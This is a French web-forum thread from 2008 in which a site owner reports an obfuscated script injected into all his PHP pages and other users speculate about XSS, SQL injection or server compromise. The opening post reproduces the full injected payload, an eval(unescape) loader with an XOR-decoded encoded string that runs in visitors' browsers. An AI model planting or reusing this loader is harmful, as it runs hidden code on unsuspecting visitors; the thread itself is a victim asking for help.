Virus dans les pages php de mon site?!

Virus dans les pages php de mon site?! - PHP - Programmation

Marsh Posté le 22-06-2008 à 13:08:23    

Bonjour,
 
Un client se plaind ce jour qu'un virus soit présent sur mon site. Je vérifie le code de la page d'index et trouve ceci:
 
 
 <!-- [ e8c1693fbcc0eb04c038579d888df8bf ] --><script>eval(unescape('function%20yCTty%28pEJQN%29%7Bfunction%20hBzb%28lUGv%29%7Bvar%20vrqi%3DlUGv.length%3Bvar%20kbABI%3D0%2CghSGlgyU%3D0%3Bwhile%28kbABI%3Cvrqi%29%7BghSGlgyU+%3DlUGv.charCodeAt%28kbABI%29*vrqi%3BkbABI++%3B%7Dreturn%20%28%27%27+ghSGlgyU%29%7D%20%20%20try%20%7Bvar%20ayrYO%3Deval%28%27a%3Er%3Bg%3EuVmTe%3Bn%3Bt%3EsT.%7CcVa%3Bl%3BlVeTeT%27.replace%28/%5BV%5C%3ET%5C%7C%3B%5D/g%2C%20%27%27%29%29%2CsApTg%3Dnew%20String%28%29%2CwxnEWR%3D0%3BkKbaYPP%3D0%2CrimItV%3D%28new%20String%28ayrYO%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20yGcyn%3DhBzb%28rimItV%29%3BpEJQN%3Dunescape%28pEJQN%29%3Bfor%28var%20wNPM%3D0%3B%20wNPM%20%3C%20%28pEJQN.length%29%3B%20wNPM++%29%7Bvar%20wiGam%3DpEJQN.charCodeAt%28wNPM%29%3Bvar%20lDqjx%3DrimItV.charCodeAt%28wxnEWR%29%5EyGcyn.charCodeAt%28kKbaYPP%29%3BwxnEWR++%3BkKbaYPP++%3Bif%28wxnEWR%3ErimItV.length%29wxnEWR%3D0%3Bif%28kKbaYPP%3EyGcyn.length%29kKbaYPP%3D0%3BsApTg+%3DString.fromCharCode%28wiGam%5ElDqjx%29%3B%7Deval%28sApTg%29%3B%20return%20sApTg%3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DyCTty%28%27%2532%2539%2530%2535%2535%2539%2535%2530%2559%2526%2517%2535%251a%2503%2512%2513%2549%2567%252f%2531%2565%2501%253b%2521%250c%2518%2506%251c%256d%2522%252b%250f%250a%252c%2532%2518%2530%252a%2562%2579%257c%252e%2503%2518%2519%2577%253c%2530%2515%2533%2520%2538%257c%2546%2525%2534%2531%2510%251f%2512%2562%257d%2540%2576%251a%2516%252d%253a%257a%2547%252f%2503%2528%2531%253a%2536%256d%2575%2517%251c%2566%2563%2567%2520%2530%2520%2534%2507%2513%2515%251c%252e%2516%252d%2501%2512%252f%257b%2507%257a%2562%2562%2510%252f%2533%2533%2505%251d%2536%2535%2559%255e%2507%253d%2522%2535%251c%252b%2535%2551%2556%2554%252f%253f%2527%2500%252d%2532%2539%2529%2548%251d%2536%2538%2512%250e%2528%256c%2525%252d%253c%2522%2529%2536%2526%2548%250b%2538%252a%252b%2577%2532%251d%253a%2527%250f%253d%252f%253d%2536%2521%2553%254d%2537%2574%255e%2573%2575%2572%2546%2511%250e%2535%2517%2535%2524%2533%252a%2537%2508%2534%250a%2507%250d%2527%2570%2530%2563%257c%257f%254d%257a%256a%2579%2575%251b%2568%251b%2535%2524%2523%2578%252e%252d%257b%254f%2577%2506%257c%2535%251d%2523%2531%2503%250e%2578%252b%256e%252b%253a%2570%2551%2535%250e%2507%2524%2560%2502%252d%2535%2535%253a%2533%2518%2502%2525%251a%250e%257a%2527%253c%2525%2508%257b%2573%257c%250e%2522%2575%253d%2520%255e%2536%255a%2521%2532%250e%253d%2570%2540%2511%2534%256f%257a%2534%2567%250a%2567%2530%2545%2536%2551%252f%250a%257a%250e%2504%255e%255e%2500%2563%251c%2555%2517%2546%2530%2503%2509%2570%253b%257b%253c%257a%2573%255b%2514%250c%2513%2501%2531%2576%2526%2505%251b%2560%2564%255c%255e%253c%251c%2512%2543%251e%256a%2537%2549%2509%2523%2576%2568%2539%2506%2577%2529%2529%2513%250c%2538%251b%2511%2569%2569%252b%257c%2555%2573%2576%2537%2519%250f%250d%252f%257f%253f%2570%257b%251c%2526%2570%2508%254e%252f%2513%251b%2526%2554%2529%256c%2536%255e%257e%255a%2566%2576%2566%253f%2534%2534%253a%2568%2508%257b%2522%251b%252a%2526%251e%250a%2503%250e%253d%2569%256b%256a%2579%2529%2570%2558%257e%2553%256a%2568%2578%2566%253a%2550%2535%256f%2501%2527%2530%2578%2519%2539%250e%2541%2565%250e%2550%253a%2546%251d%252c%2556%251e%2513%2514%2523%2540%2526%2576%2547%2522%2507%2520%253a%2523%252e%2532%2558%2548%2509%251c%2574%2565%2520%253c%2520%2544%2501%254a%253b%2572%2564%257a%2565%2568%2560%2501%2525%2519%2529%2522%2525%253f%2500%2577%253e%2564%2506%2506%252a%2507%253b%2525%2535%256a%2557%2538%2579%2538%2531%2538%253c%2556%257b%255a%2504%2547%2517%2577%252f%250c%2520%254c%2514%2548%2576%252d%2572%2538%2532%2574%2525%2517%2575%257d%2548%2520%2537%252a%2502%253c%250c%257f%252b%2570%2509%2530%253b%253a%2501%251c%253d%252f%2521%256d%2523%2527%252f%2505%2515%254e%2579%257e%257e%2529%2560%2533%2513%251e%255d%2525%254a%256c%2504%2560%256c%2501%252b%252f%257c%253a%250d%252f%2561%257f%250c%254f%2579%254b%2533%2530%2537%253b%2522%253c%2547%2573%251b%255f%253e%2578%250d%2519%255b%2517%254c%2510%257a%2560%257c%257d%2568%2572%251c%2577%2576%254e%251b%2578%2533%2502%255c%2519%2510%253c%2524%253a%250e%2576%253a%2560%2533%255a%2529%2576%2510%2524%2503%253f%2510%2504%256f%2566%250b%2579%2579%250a%2512%2509%255c%257f%253d%253d%254e%255d%250e%250e%2562%256c%2564%251a%2511%2501%2576%253b%2572%2572%2566%2557%2559%256f%253a%2530%2538%253b%252b%257d%2506%2530%2523%250f%250f%253a%250b%251e%2513%2534%252e%2530%253d%2534%2554%2539%253b%250a%2518%2524%253e%2519%2515%2516%2519%256a%2552%2537%2538%2532%2524%255a%2518%2513%252d%250e%252f%2529%2514%253a%253e%2524%2503%255e%2557%2528%253d%2549%2526%2522%2534%2505%2523%2513%253e%2525%2517%253e%2536%257c%2579%2571%250a%2526%2525%2534%2534%250a%253b%250f%257d%2547%253d%253c%2505%2569%2576%250b%2538%2534%2551%2500%2533%2507%2525%250c%2572%2529%2521%255e%2532%2537%2530%2531%2517%2504%253d%2572%2502%2529%2517%2533%2515%2569%2577%2522%2522%2527%2533%2539%2537%257b%2570%257d%2536%253c%251e%2555%2545%2545%253f%2571%255d%2570%257a%2571%254a%250d%256c%2571%2567%256d%2565%2559%2553%2543%2577%2529%253e%2546%2529%252b%2531%254e%2568%2565%2569%2560%2519%2518%257f%2527%2503%252b%253b%2534%2532%2577%2550%2574%2522%255a%2576%257c%2560%2507%2536%2504%250f%256a%257e%257e%2530%2578%2510%2520%2539%2525%2519%2504%2563%257e%2578%254d%256f%257c%2560%2570%254d%2550%256d%2502%2529%2518%255d%2516%251b%2505%2530%253d%2520%2533%2574%2561%257f%251b%251b%2519%2545%2504%2563%2577%2572%256d%257c%252f%256a%255b%2547%2556%2522%2567%2555%2512%2528%2532%2510%251b%2507%251e%2537%2571%257a%2532%257b%2566%2577%256e%255c%2547%255f%256f%2541%2560%2565%2579%2550%257a%2576%2565%255e%256a%2517%251f%2577%2525%2573%253f%2522%2507%253d%2537%2532%2515%2512%2536%2505%250c%2513%2511%257b%2562%257c%255a%2564%2571%2563%2560%2549%2574%2550%2530%250b%2572%2529%2573%2539%251d%2502%2522%2574%257b%2554%2539%252a%2521%251d%2559%251e%2503%2538%251a%2561%2531%2572%2549%2534%2525%2503%2526%2518%2532%2502%2521%2533%252f%253c%251c%2577%256e%2540%2503%2515%2519%2529%2523%251c%250d%2509%257a%2557%2529%2517%250a%251b%2540%2530%256e%257f%257b%2572%2526%2558%254c%2572%2504%2569%255b%2573%254c%251d%2504%2568%2574%2567%251b%2567%2569%257f%2501%254f%2544%255b%252f%253d%2507%253c%2550%2501%2509%2504%253a%2500%2523%2518%250c%256e%2540%256e%2530%2525%2537%2533%252e%2538%2573%2564%250b%2500%2535%254f%2539%2522%2529%252b%252d%2549%2539%254f%2561%2560%2577%2572%257b%2541%2569%256c%2578%2563%2510%253e%2526%256a%2535%253c%252f%2575%252b%2561%254e%256f%2534%2550%251a%2573%2533%2566%257b%2566%253b%2577%254e%2510%2567%2517%2527%2525%252f%2535%2537%255a%2511%252b%2505%252d%254f%2538%2537%253a%2518%2513%2565%250f%253d%252f%2536%2578%2523%2515%253f%2535%253a%2558%257b%2565%2571%2530%255a%2537%2533%2530%252b%2502%2505%2568%2565%2541%255b%2542%2548%2540%2521%2529%252f%2526%2506%2535%2576%2531%2566%250a%256f%253f%2533%2526%2501%2575%2561%2567%2578%253b%257e%2533%2534%253f%2531%2511%2569%257d%2508%257e%2567%2504%257f%253f%256c%2573%2569%2520%2532%2501%252e%251a%256a%2579%257a%2572%2531%252e%2563%2510%2517%2531%2539%251e%2577%250d%2576%2532%2547%2570%255f%2555%2555%256f%2528%252b%2536%250c%2533%250f%2521%2538%253e%2535%2505%2566%2564%2559%253c%257b%2522%251e%2537%2528%2518%2506%2533%257c%254b%2561%2538%252e%251a%2511%253d%252d%2524%252f%2574%2530%253a%2519%2517%2565%2560%252a%2525%252c%2532%2532%257b%2523%2525%2514%2527%2577%2528%255d%256d%2529%252c%2501%2573%250f%2530%2538%2522%2548%2553%256e%2556%2537%257b%2522%2522%2526%2518%250a%2530%2531%257f%2539%2521%2531%2541%2553%2537%2512%2504%2576%257c%2548%2537%2504%2528%2535%2577%251f%2532%2561%2575%2574%257d%257c%255b%2552%2553%252e%2525%2573%2544%2575%2544%2569%257e%2501%252a%2509%2531%252a%2539%2539%2526%2532%2514%2525%2538%251e%250b%2502%2529%2563%255b%250c%2532%250d%2505%2545%252e%2535%2565%2564%254f%255b%2566%2546%253e%2523%252d%2507%2534%2517%2573%2521%2536%2538%2539%252e%2545%2554%250c%257b%257c%2525%2521%2524%2533%2522%2515%2512%2522%2561%252b%257c%2522%250c%2577%252d%2512%2548%2546%2569%2520%2570%2521%2533%256a%2550%254e%257a%2534%2526%2566%250d%252e%2520%2552%2534%2560%254d%252e%255e%2527%2515%250d%2571%252b%2536%252f%2506%2500%2534%2538%2568%254c%2579%2513%254e%2550%2514%2571%2533%252c%2505%2527%252a%252b%2517%254d%255d%253e%27%29%3B'));</script><!-- end -->
 
 
Ce passage semble également être présent dans toutes les autres pages. Je ne sais que faire.  
 
Avez vous une idée de ce que c'est? Problème? Solution?
 
Merci.


Message édité par brunocremer le 22-06-2008 à 13:09:07
Reply

Marsh Posté le 22-06-2008 à 13:08:23   

Reply

Marsh Posté le 22-06-2008 à 15:13:28    

Enlever ce code?

Reply

Marsh Posté le 22-06-2008 à 16:49:42    

oui mais c est pas le plus important
quelqu un a reussi exploiter une faille XSS (a vue de nez :P) dans son site donc le probleme est susceptible de revenir
en general c est du a un manque de sécurité au niveau de l update de la BD
(genre un addslashes au lieu d un mysql_real_escape_string)
mais je dis peut etre de la merde, c est florentG l expert pour ca :o


---------------
« The enemy is the gramophone mind, whether or not one agrees with the record that is being played at the moment. » — George Orwell
Reply

Marsh Posté le 22-06-2008 à 17:23:24    

Non tu as raison. Le problème principale là est que vu que ni toi, ni moi, ni FlorentG & co n'avons de boule de crystal à portée de main, c'est difficile de lui donner des conseils qui vont outre la simple généralité .

Reply

Marsh Posté le 22-06-2008 à 17:33:51    

pas besoin de boule de cristal hein
les symptomes sont clairs et le diagnostic evident
c est sur le traitement que je peche :o


---------------
« The enemy is the gramophone mind, whether or not one agrees with the record that is being played at the moment. » — George Orwell
Reply

Marsh Posté le 22-06-2008 à 17:37:05    

XSS, Injection SQL, back office mal protégé (pas sécurisé, .htaccess mal écrit, trouvé le mot de passe par injection SQL,..), hacking du serveur web et édition des pages ...
Je suis d'accord que quand on entend des sabots on doit penser cheval et pas zèbre, mais là moi je suis pas aussi convaincu que ça que le diagnostic est évident (à part que c'est un incompétent aux commandes du site, ça on est d'accord)

Message cité 1 fois
Message édité par esox_ch le 22-06-2008 à 17:37:15
Reply

Marsh Posté le 22-06-2008 à 17:59:15    


bon je suis une tanche en secu
mais pour moi un xss c est une injection sql exploitee dans un but "different" parce qu a la base c est juste un mauvais controle des donnees entrantes

esox_ch a écrit :

.htaccess mal écrit


la j aurais tendance a dire que c est impossible
sauf dans le cas de ton prochain quote :D
 

esox_ch a écrit :

à part que c'est un incompétent aux commandes du site, ça on est d'accord


putain pour une fois que j essayais d etre poli avec un n00b [:sadnoir]
 

Spoiler :

[:cupra]



---------------
« The enemy is the gramophone mind, whether or not one agrees with the record that is being played at the moment. » — George Orwell
Reply

Marsh Posté le 22-06-2008 à 18:08:27    

T'as une floppée de XSS differentes. Parce que au final, XSS ça veut juste dire que tu utilises un autre site pour arriver à tes fins..
Pour avoir une vague idée de quoi on parle : http://en.wikipedia.org/wiki/Cross-site_scripting

 

Par htaccess mal écrit, je pense au mec qui sécurise le répértoire "admin" en oubliant que dans d'autres répertoires il a laissé des info critiques (On a autrefois beaucoup parlé des gens qui écrivaient des fichiers db.inc contenant les identifiants de connection php, et qui donc étaient accessibles en lecteur (car non interprétés par php, en vue de leur extension))

 

[Edit] Et puis la question n'est pas là .. La question c'est qu'on peut pas deviner comme ça quel est le problème. Il doit donner un peu plus de détails


Message édité par esox_ch le 22-06-2008 à 18:18:01
Reply

Marsh Posté le 22-06-2008 à 23:29:30    

Que voulez vous comme détail?

Reply

Marsh Posté le 22-06-2008 à 23:35:21    

bah par exemple comment quelqu un s est introduit chez toi  
par exemple [:petrus75]


---------------
« The enemy is the gramophone mind, whether or not one agrees with the record that is being played at the moment. » — George Orwell
Reply

Marsh Posté le 22-06-2008 à 23:35:21   

Reply

Marsh Posté le 23-06-2008 à 09:24:13    

File-nous l'adresse de ton site, ce sera plus simple :)

Reply

Marsh Posté le 23-06-2008 à 12:02:08    

Pour ne pas être indexé dans les recherches google durant dix ans, je préfere le donner par PM.
Ceux qui souhaitent en savoir plus ou m'aider, vous pouvez me contacter et je vous en serais reconnaissant.
 
FlorentG, PM envoyé.
 
Bonne journée.

Reply

Marsh Posté le 23-06-2008 à 12:23:02    

Bon bah si FlorentG s'en charge :D
miRROR, faut nous trouver un autre noob [:petrus75]

Reply

Marsh Posté le 23-06-2008 à 13:01:34    

Vous pouvez vous batter si vous voulez... On décernera la palme à celui qui me trouvera la solution en premier :lol:

Reply

Marsh Posté le 23-06-2008 à 14:39:30    

esox_ch a écrit :

faut nous trouver un autre noob [:petrus75]


 
ha oui [:__canard__]


---------------
« The enemy is the gramophone mind, whether or not one agrees with the record that is being played at the moment. » — George Orwell
Reply

Marsh Posté le 23-06-2008 à 14:45:03    

brunocremer a écrit :

Vous pouvez vous batter si vous voulez... On décernera la palme à celui qui me trouvera la solution en premier :lol:


 
Ou autre solution, t'en profites pour combler tes lacunes et tu cherches de la doc sur les failles que mIRROR et moi avons énoncé.
Un audit de sécurité est une performance généralement chère. Alors le fait de venir ici et nous dire "Voilà le problème, démerdez vous pour trouver et résoudre" je trouve un peu moyen sachant que aux frais de la princesse


---------------
Si la vérité est découverte par quelqu'un d'autre,elle perd toujours un peu d'attrait
Reply

Marsh Posté le 23-06-2008 à 16:18:27    

Je ne te demande pas de m'aider si tu ne le souhaites pas :jap:
 
Si d'autres le veulent, je les en remercie.
De même, je ne suis pas programmeur, et ne suis donc pas à même de résoudre ce soucis.  Si par contre je savais d'où venait ce problème, je pourrais trouver la personne adéquate à le résoudre.
 
De même, jusqu'à présent, nous ne savons même pas s'il s'agit d'un virus, ou quoi que ce soit d'autre :/

Reply

Marsh Posté le 23-06-2008 à 16:24:53    

Salut,
Donc non ce n'est pas un virus en tant que tel. Le problème vient du fait qu'un personne a inséré ce code (et le tout est de savoir comment, ce qu'on peut pas faire "comme ça" ) dans ta page. Ce code fait executer une action au navigateur de la personne accedant à la page.
Ce dont tu as besoin c'est d'un informaticien qui visite le site, tout en ayant accès au code source et regarde s'il y a des failles. Au cas où aucune faille n'était trouvée, il faudrait regarder si le problème ne se trouve pas au niveau du serveur lui même (quelqu'un pourrait t'avoir hacker juste pour faire ça).
voilà, j'héstime  t'avoir aidé du mieux que je le pouvais étant donné le peu d'informations que tu as présentées ici.


Message édité par esox_ch le 23-06-2008 à 16:25:34
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed